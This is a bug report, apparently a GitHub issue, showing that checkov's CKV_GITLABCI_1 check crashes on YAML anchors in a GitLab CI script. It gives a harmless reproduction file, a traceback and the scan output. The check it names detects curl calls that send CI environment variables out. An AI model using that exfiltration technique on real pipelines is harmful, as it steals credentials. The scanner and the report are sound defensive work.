CKV_GITLABCI_1 AttributeError when using yaml anchors in script: #7390
Description
Steps to reproduce:
- Create a
.gitlab-ci.ymlfile ; the name is important. Content:
.gitlab_creds: &gitlab_creds
- echo hello
fmt:
image: alpine/terragrunt:tf1.12.2
script:
- *gitlab_creds
- terraform fmt -check -recursiveThe - *gitlab_creds is an anchor, documented here.
- Run checkov:
podman run --tty --rm --volume $(pwd):/tf bridgecrew/checkov:3.2.495 --file /tf/.gitlab-ci.yml. Output:
2025-12-04 16:50:19,587 [MainThread ] [ERROR] Failed to run check CKV_GITLABCI_1 on /tf/.gitlab-ci.yml:*.script[].*.script[]
Traceback (most recent call last):
File "/usr/local/lib/python3.11/site-packages/checkov/common/checks/base_check.py", line 68, in run
check_result["result"] = self.scan_entity_conf(entity_configuration, entity_type)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/local/lib/python3.11/site-packages/checkov/gitlab_ci/checks/base_gitlab_ci_check.py", line 31, in scan_entity_conf
return self.scan_conf(conf)
^^^^^^^^^^^^^^^^^^^^
File "/usr/local/lib/python3.11/site-packages/checkov/gitlab_ci/checks/job/SuspectCurlInScript.py", line 21, in scan_conf
for line in conf.values():
^^^^^^^^^^^
AttributeError: 'list' object has no attribute 'values'
_ _
___| |__ ___ ___| | _______ __
/ __| '_ \ / _ \/ __| |/ / _ \ \ / /
| (__| | | | __/ (__| < (_) \ V /
\___|_| |_|\___|\___|_|\_\___/ \_/
By Prisma Cloud | version: 3.2.494
Update available 3.2.494 -> 3.2.495
Run pip3 install -U checkov to update
gitlab_ci scan results:
Passed checks: 2, Failed checks: 0, Skipped checks: 0
Check: CKV_GITLABCI_1: "Suspicious use of curl with CI environment variables in script"
PASSED for resource: fmt
File: /tf/.gitlab-ci.yml:8-9
Check: CKV_GITLABCI_3: "Detecting image usages in gitlab workflows"
PASSED for resource: fmt
File: /tf/.gitlab-ci.yml:5-6